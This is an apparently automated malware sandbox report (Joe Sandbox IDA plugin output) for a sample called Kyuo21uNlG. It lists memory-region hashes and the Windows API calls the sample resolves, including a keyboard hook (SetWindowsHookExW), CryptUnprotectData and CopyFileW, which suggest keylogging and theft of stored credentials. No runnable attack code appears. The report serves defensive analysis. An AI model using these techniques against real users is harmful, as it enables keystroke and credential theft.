                                            • API ID:
                                            • String ID: gGY$rGY
                                            • API String ID: 0-4086360228
                                            • Opcode ID: fd71a69c540380727dde15719860dda4aedf94f4077dfd222bd6e8955c0e17d0
                                            • Instruction ID: 78c9ae32a1dd0a91d0ed18256cb0bd68cc027b6765ded0a30966e104a918473b
                                            • Opcode Fuzzy Hash: fd71a69c540380727dde15719860dda4aedf94f4077dfd222bd6e8955c0e17d0
                                            • Instruction Fuzzy Hash: 2871C275E00218CFDB54DFAAD981ACDBBB2BF88300F54D2A9D508EB255DB309981CF55
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: P
                                            • API String ID: 0-1343716551
                                            • Opcode ID: 235bf8b2c1f89875312dbba9a6e60bbec1192ea53595c80e80dd79373232b668
                                            • Instruction ID: 8d6b640372fa780bf942f175da39117907b0383e385475dee93af2e038dddea0
                                            • Opcode Fuzzy Hash: 235bf8b2c1f89875312dbba9a6e60bbec1192ea53595c80e80dd79373232b668
                                            • Instruction Fuzzy Hash: CEA23E74E412298FDBA4DF69C984B9DBBB1BB49300F1091EAD80DA7355DB30AE81CF54
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4bb6135219b0389644f518833fd12e94bb1e9a587fa10becc780f3368c16a457
                                            • Instruction ID: 5f0fe9f691658f8c6d10fc645e50f58d80ce63eaede4411c51aca6e8688e21fb
                                            • Opcode Fuzzy Hash: 4bb6135219b0389644f518833fd12e94bb1e9a587fa10becc780f3368c16a457
                                            • Instruction Fuzzy Hash: 24428E78E052298FDBA0CF68D985B9DBBF1BB49304F1481E6E849E7755E7309E818F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7753fcad97cbdca6d5fb4f60dea1a934a580f55654629c43b3150101bb796ad4
                                            • Instruction ID: 6b2159be1ae11e046f179abb3e87ced0f090c33680b35e71330a7d90d13b6d74
                                            • Opcode Fuzzy Hash: 7753fcad97cbdca6d5fb4f60dea1a934a580f55654629c43b3150101bb796ad4
                                            • Instruction Fuzzy Hash: 5802A274E012298FDBA4DF69D988B9DBBF2BB48300F1481E6E449E7355E7349A81CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q
                                            • API String ID: 0-388095546
                                            • Opcode ID: b124003e22014c6a7679e8fec987639255c5d243c2067894ceac9aa687717398
                                            • Instruction ID: 40581305e73118cb4a43fe240d79653559f98297fc87748a391ddf3a0d0b0c47
                                            • Opcode Fuzzy Hash: b124003e22014c6a7679e8fec987639255c5d243c2067894ceac9aa687717398
                                            • Instruction Fuzzy Hash: BF427C74E01228CFDBA4DF68C985BDDBBB1BB49300F1485AAE809E7355D734AA81CF54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D
                                            • API String ID: 0-3280389146
                                            • Opcode ID: 3f61a848efefd115c1a5c653ecdbd7fc3106f2042c5d78ce613a05ced8f2a02c
                                            • Instruction ID: 10fd304f28938ef9614dbb006a3aacbfd0ccaf4881edd394fb3b6737b3cb8c71
                                            • Opcode Fuzzy Hash: 3f61a848efefd115c1a5c653ecdbd7fc3106f2042c5d78ce613a05ced8f2a02c
                                            • Instruction Fuzzy Hash: 98F1B574E016188FDB64DF69C885ADDBBB2FF89300F14C2A5E419AB355DB34AA81CF40
                                            APIs
                                            • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 06A2E6FB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: 0f59bfd6c84ef1a99dc1dcaf8c10c8bd44eea19243c7cde7f094e19d3c9f91e8
                                            • Instruction ID: 045260fd8eabe864cdc02bdaab00a915be01f971cb6af237e42c1cee0091c517
                                            • Opcode Fuzzy Hash: 0f59bfd6c84ef1a99dc1dcaf8c10c8bd44eea19243c7cde7f094e19d3c9f91e8
                                            • Instruction Fuzzy Hash: AE2134B1D002598FCB54DF9AC844BEEFBF5FB88310F10842AE459AB250C774A984CFA5
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 069EDE2D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: ec84cedbcf232bbbf273aa6df1e0a709530bad2b980e9e64daafba3e1b828f17
                                            • Instruction ID: 14ba6c87a9e93004069f99c6d6c0c078c6cd82d1c000a2c7302e7ae72110c163
                                            • Opcode Fuzzy Hash: ec84cedbcf232bbbf273aa6df1e0a709530bad2b980e9e64daafba3e1b828f17
                                            • Instruction Fuzzy Hash: B7116776800249DFCB11CF99C844BEEBFF4EF48320F108429E518A7610C339A994CFA1
                                            APIs
                                            • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 069EDE2D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: daef35c61f862d20cb681a81a632c73eebf50962db6fd494c201153d348dbca1
                                            • Instruction ID: e6c283a0027618c0ccaa50cc1eb363ff07e99a7a8b39fe6ee545e9e1b95af159
                                            • Opcode Fuzzy Hash: daef35c61f862d20cb681a81a632c73eebf50962db6fd494c201153d348dbca1
                                            • Instruction Fuzzy Hash: 051164B2800249DFCB10CF9AC804BEEBFF4EF48320F148419E528A7650C339A554DFA5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 5xID
                                            • API String ID: 0-3965296546
                                            • Opcode ID: 50e8159d87212107151304f9b9bee3a63a807a06d37b2b7b1f11c1bf3cb98638
                                            • Instruction ID: 6d5cba18449aaf460c720a1ac7327be4495584359e7ca466a32a9acad6194077
                                            • Opcode Fuzzy Hash: 50e8159d87212107151304f9b9bee3a63a807a06d37b2b7b1f11c1bf3cb98638
                                            • Instruction Fuzzy Hash: 0BE1D374E002098FDB54DFA9D580A9EBBF1FF48304F1481AAE509EB355EB34AA45CF51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D
                                            • API String ID: 0-3280389146
                                            • Opcode ID: 9f77c52ae413ea625b17b4e1a40c9326bbe6ea1112cdc2648dbfec4bb1500291
                                            • Instruction ID: 375154c0679fef5deef09342a7742647f3f720d3f03d81892a8b5ca0b8942890
                                            • Opcode Fuzzy Hash: 9f77c52ae413ea625b17b4e1a40c9326bbe6ea1112cdc2648dbfec4bb1500291
                                            • Instruction Fuzzy Hash: 12C1E374A011198FDBA4DF68C885A9DBBB2FF88300F1482A5E519E7395DB34EE81CF40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D
                                            • API String ID: 0-3280389146
                                            • Opcode ID: 8800c67e9e1898781a712d9970f5655d037754db241aeafa9bfa3bb4edba19a5
                                            • Instruction ID: 01a7b4872b8fed9de5ba5a5be23866218728e1bf55f8202283e1f3935e566698
                                            • Opcode Fuzzy Hash: 8800c67e9e1898781a712d9970f5655d037754db241aeafa9bfa3bb4edba19a5
                                            • Instruction Fuzzy Hash: E9C1E474A011198FDB64DF68C885A9DBBB2FF89300F1492A5E519E7395DB34EE81CF40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: D
                                            • API String ID: 0-3280389146
                                            • Opcode ID: 464919246f9187664107ac9d98b09475d43b4929d3aae252074c74cc2f9ad257
                                            • Instruction ID: c44cc97c3e091afd8f4c70e81431aae27c345339177885c790a52719b71a054f
                                            • Opcode Fuzzy Hash: 464919246f9187664107ac9d98b09475d43b4929d3aae252074c74cc2f9ad257
                                            • Instruction Fuzzy Hash: DDC1E474A011198FDB54DF68C985A9DBBB2FF88300F1482A5E519EB355DB34EE81CF40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (?
                                            • API String ID: 0-2424342099
                                            • Opcode ID: 032a15afdb33c4c29642b7b8e1e7cdf348be295b7c7b36b7a77d683442a617b0
                                            • Instruction ID: fa273221bbc9f1c7c4e05cbb63275f080ef6f3efd4a93fe3c97d3c144542dfb8
                                            • Opcode Fuzzy Hash: 032a15afdb33c4c29642b7b8e1e7cdf348be295b7c7b36b7a77d683442a617b0
                                            • Instruction Fuzzy Hash: BA917A70E05A19CFDB54CFA9D880A9EBBB2BB89304F14C169D409EB355EB30D986CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: J
                                            • API String ID: 0-1141589763
                                            • Opcode ID: 4c37951936f7877c858ce8f6cab93fcbe1a2a99da2eb75e53144e900ca4b920b
                                            • Instruction ID: 1eafb8e03f77a39016d2401eff793bb01aa6aae2df9feaa209d5fb49a25acce7
                                            • Opcode Fuzzy Hash: 4c37951936f7877c858ce8f6cab93fcbe1a2a99da2eb75e53144e900ca4b920b
                                            • Instruction Fuzzy Hash: D8A12374E00619CFDB64CF69D880B9DBBB2FB88300F14C6A5E509E7255EB34AA81CF50
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: rCI
                                            • API String ID: 0-4128173682
                                            • Opcode ID: ca52fce3e2c931a8774e3fd34fc4798ac498e135048538852c94a38fef9326cd
                                            • Instruction ID: a7c2c9c6c70020481dae889ca0bdcf1476a8ddfadcccd8a17ece33b4a0ca81d5
                                            • Opcode Fuzzy Hash: ca52fce3e2c931a8774e3fd34fc4798ac498e135048538852c94a38fef9326cd
                                            • Instruction Fuzzy Hash: B091F574E052199FCB14CFA9D880ADEBBF5EB89300F14C5AAE509E7365DB34AE418F50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7ecbc2ae558f4ae01450fa3d884ab829878fb3ff7fa973bb7406fe73df7f0018
                                            • Instruction ID: dea8a036586addd12088257108cca611300032dc31e19f0e35fbf64be337c35c
                                            • Opcode Fuzzy Hash: 7ecbc2ae558f4ae01450fa3d884ab829878fb3ff7fa973bb7406fe73df7f0018
                                            • Instruction Fuzzy Hash: 5DA20734A00218DFDB25DF64D884AEEBBB2FF89305F1485AAE84997355DB35AD81CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7162e61d5ccab00f78da6fdccce63c6892c6a2ec1849b96b7703078c3d92c4d4
                                            • Instruction ID: ff13a413e155cbe03832212d7d126ae79129d19788de107bf47404718712dcd7
                                            • Opcode Fuzzy Hash: 7162e61d5ccab00f78da6fdccce63c6892c6a2ec1849b96b7703078c3d92c4d4
                                            • Instruction Fuzzy Hash: 43529E74E402298FDBA4DF69C980BDDBBF1BB49310F1482A6E418E7355E734AA85CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5422691e5b724c751d3b621512611f922a6aabbd540ca2ed9b3518693292e834
                                            • Instruction ID: 2374211b42915d9dadceedd7778a47c24567f220ef79f38a65e98abf21da3688
                                            • Opcode Fuzzy Hash: 5422691e5b724c751d3b621512611f922a6aabbd540ca2ed9b3518693292e834
                                            • Instruction Fuzzy Hash: 9D425E74E412298FDBA5CF69C984BD9BBF5BB49300F1085EAE81DA7351E7309E818F50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d9912f3caffcf9ef18c80684e7b81966c2172a9dd5fd738ae4eb5e00aead3a20
                                            • Instruction ID: 3ef8558916caf916dd9a94ba91583f556547ee71681a873399316188ada4a9b8
                                            • Opcode Fuzzy Hash: d9912f3caffcf9ef18c80684e7b81966c2172a9dd5fd738ae4eb5e00aead3a20
                                            • Instruction Fuzzy Hash: 49F14875E1111C8FDB64CFA8C884ADDBBB2BB89305F1486A5E419E7254DB34EA86CF40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 56e63156c2fee23bcf15521295367f15bf8b0c64a45b96218f3c3879985a52cf
                                            • Instruction ID: eb52244da86fadb209e35ba4529e4e3145025a891a15cf66dd22320eebbece27
                                            • Opcode Fuzzy Hash: 56e63156c2fee23bcf15521295367f15bf8b0c64a45b96218f3c3879985a52cf
                                            • Instruction Fuzzy Hash: FB02CF74E412198FDB50EFACD984B9DBBB2BF49300F1482A5E419E7396DB34A981CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131825346.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_71a0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c1d30d89c433564f9aaa9ddc79d474343c7f89156a06c1d3a0f7f162527d7c0
                                            • Instruction ID: cbfb1c52f2ae41ade46f46604274721727a8868a263966cdfbd5634d8d4fac75
                                            • Opcode Fuzzy Hash: 2c1d30d89c433564f9aaa9ddc79d474343c7f89156a06c1d3a0f7f162527d7c0
                                            • Instruction Fuzzy Hash: 03F14CB5A0061AEFCF15CF68C4849ADBBF6FF49301F558429D906EB290E734EA85CB41
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4130044758.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5440000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 02f3ba71fce635d113b55e4120ea5942b78101706461d32cfd01e7cedf10df10
                                            • Instruction ID: 09c760d521aab9abba67bb23d5257b13dd92de68b2fecfd4c46a1b68ed3d65ef
                                            • Opcode Fuzzy Hash: 02f3ba71fce635d113b55e4120ea5942b78101706461d32cfd01e7cedf10df10
                                            • Instruction Fuzzy Hash: F8F15370A00245DFDB08DFA5D994AAEBBB2FF88300F108569E906AB395DB35DD46CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 335adf09d84c7a5800be99a0a511941d655b40ae7ab8692802d0aa6e6e54db3e
                                            • Instruction ID: 54973a10858a71c211114a5626156ecd1ecfb4c36d1605f4c0f0764146a20326
                                            • Opcode Fuzzy Hash: 335adf09d84c7a5800be99a0a511941d655b40ae7ab8692802d0aa6e6e54db3e
                                            • Instruction Fuzzy Hash: EFD19F74E00229CFDB54DFA9C984B9DBBF2BB48304F1481A9E419EB355DB34A981CF61
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a78effc58e089ce7dbb9d7f7924be929f83100abec9edb99ce641a5d5c8f5f2
                                            • Instruction ID: b5af71a058c94449e5e9ed1069ee6bea4820691a8c32acfac929ad9c86bf15aa
                                            • Opcode Fuzzy Hash: 5a78effc58e089ce7dbb9d7f7924be929f83100abec9edb99ce641a5d5c8f5f2
                                            • Instruction Fuzzy Hash: 8291BF75E00229CFDB64DFA9D880A9DBBF2FB88300F14816AE819EB355D734A941CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c3de9c770a2b28410629f6f9a0111b0f0b2fe52021ba67fd51460c41c788b88
                                            • Instruction ID: b08ffbbce12920a034b4968118678e7655dce6b35c1ea134e2bdc8f8ba1d5a9f
                                            • Opcode Fuzzy Hash: 7c3de9c770a2b28410629f6f9a0111b0f0b2fe52021ba67fd51460c41c788b88
                                            • Instruction Fuzzy Hash: BB71A2B4E002198FDB44CFAAC984A9EBBF2FF89300F25C169E515AB365D734A945CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4124818213.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b00000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e96e5408d8d95b0d5d7cad79c142b493750a0545f9eac8507714fe2b7e0af534
                                            • Instruction ID: fae12e24309f306ef3f59520222379b22f8a1a35964cc1c2f7ed155ffb324c11
                                            • Opcode Fuzzy Hash: e96e5408d8d95b0d5d7cad79c142b493750a0545f9eac8507714fe2b7e0af534
                                            • Instruction Fuzzy Hash: 1D71E6B4E042498FDB44CFA9C984A9EBBF2BF89300F15816AE515AB365D7349D06CF50
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9e3a197d888ce0b73380522b53544a8e4cc774bc1574d630cfc803d120eea378
                                            • Instruction ID: a461a7f5e9d5a9918cd3c6a29c0c2caa95e4054812ccb6138813fc2e880a7f37
                                            • Opcode Fuzzy Hash: 9e3a197d888ce0b73380522b53544a8e4cc774bc1574d630cfc803d120eea378
                                            • Instruction Fuzzy Hash: CB411275E412088BDB18DFAAD8805EDFBF2EB89310F18E12AD814F7265D7349846CB95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2b0acdaae865de3ea3438714a353e3edfafe8f97ccf5e458ee41c9c1b8578d2c
                                            • Instruction ID: b9e47361a940d0126d119bb2da628e6ea3e15a73d638b515b48fcd0cd1b69974
                                            • Opcode Fuzzy Hash: 2b0acdaae865de3ea3438714a353e3edfafe8f97ccf5e458ee41c9c1b8578d2c
                                            • Instruction Fuzzy Hash: 0C315771D01628CBEB58CFA6D84479EBBB3FF89300F10C16AD849AB254DB704A46CF51
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131474214.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6a20000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 08c0530b1316ec9e8a88aee1c0e9548f94c427a055e5049082558d55596c5617
                                            • Instruction ID: f2403f3d2e082009854a3bcdfafe210fa33968636d0803956ca6e6033bd49d22
                                            • Opcode Fuzzy Hash: 08c0530b1316ec9e8a88aee1c0e9548f94c427a055e5049082558d55596c5617
                                            • Instruction Fuzzy Hash: 6C314971E496198FEB48DFAACC00BDEBAB3AFC9300F04C16AD548A6265DB740946CF51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3339 71a64bc-71aaaec 3342 71aab9c-71aabbc call 71a6394 3339->3342 3343 71aaaf2-71aaaf7 3339->3343 3350 71aabbf-71aabcc 3342->3350 3345 71aab4a-71aab82 CallWindowProcW 3343->3345 3346 71aaaf9-71aab30 3343->3346 3347 71aab8b-71aab9a 3345->3347 3348 71aab84-71aab8a 3345->3348 3353 71aab39-71aab48 3346->3353 3354 71aab32-71aab38 3346->3354 3347->3350 3348->3347 3353->3350 3354->3353
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 071AAB71
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131825346.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_71a0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID: TE
                                            • API String ID: 2714655100-3544767682
                                            • Opcode ID: 11aa753228468772403064322cc612cc510a33f101fd01f588a0d967889167d0
                                            • Instruction ID: b567082b21af3d0d9e0e61f45d4c83709db5f138c08be93ebcd5db866d6ee2c1
                                            • Opcode Fuzzy Hash: 11aa753228468772403064322cc612cc510a33f101fd01f588a0d967889167d0
                                            • Instruction Fuzzy Hash: AF4127B8900309DFCB14CF99C488AAABBF5FF89314F24C459D519AB361D774A941CFA0
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 071A8602
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131825346.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_71a0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 53badbfb6f5dca50524b50ad3d5c63df8442e5a0db6e73445e1407e99419b810
                                            • Instruction ID: cc42094409f6e175f8b2d3f013d41642f3fc5b6d00006264944052539f9da1f5
                                            • Opcode Fuzzy Hash: 53badbfb6f5dca50524b50ad3d5c63df8442e5a0db6e73445e1407e99419b810
                                            • Instruction Fuzzy Hash: DF51E0B5C00349AFDF15CFA9C984ADEBFB5BF88314F24812AE818AB250D7709845CF91
                                            APIs
                                            • CopyFileW.KERNEL32(?,00000000,?), ref: 069EC6C1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131360586.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_69e0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CopyFile
                                            • String ID:
                                            • API String ID: 1304948518-0
                                            • Opcode ID: deea68b635ef6d570166f5405ca377533ad638862bf2b7825f84faaca7f4d5f0
                                            • Instruction ID: a10150e9460ae0f0d7113153db2372a556bef83e5b4cb92e7402b509aa4094bb
                                            • Opcode Fuzzy Hash: deea68b635ef6d570166f5405ca377533ad638862bf2b7825f84faaca7f4d5f0
                                            • Instruction Fuzzy Hash: 9F41B471C063A59FCB01DF69C8506DEBFF0EF45310F1540AAD4D4EB252D2789985CBA5
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 071A8602
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131825346.00000000071A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_71a0000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: e20ae6cf2cbb50ce54981bce7f73a6777f14763f000d63318aec75755343e639
                                            • Instruction ID: 9af8fb831a221fae9dadb77ad62369ea975603e152807f2a2851da121ef1e7e1
                                            • Opcode Fuzzy Hash: e20ae6cf2cbb50ce54981bce7f73a6777f14763f000d63318aec75755343e639
                                            • Instruction Fuzzy Hash: FA41C0B5D00349AFDB15CF9AC984ADEBBB5BF88314F24812AE818AB250D7749845CF91
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(00000000,037F60D8,02877C90), ref: 06873196
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.4131242540.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6870000_Kyuo21uNlG.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
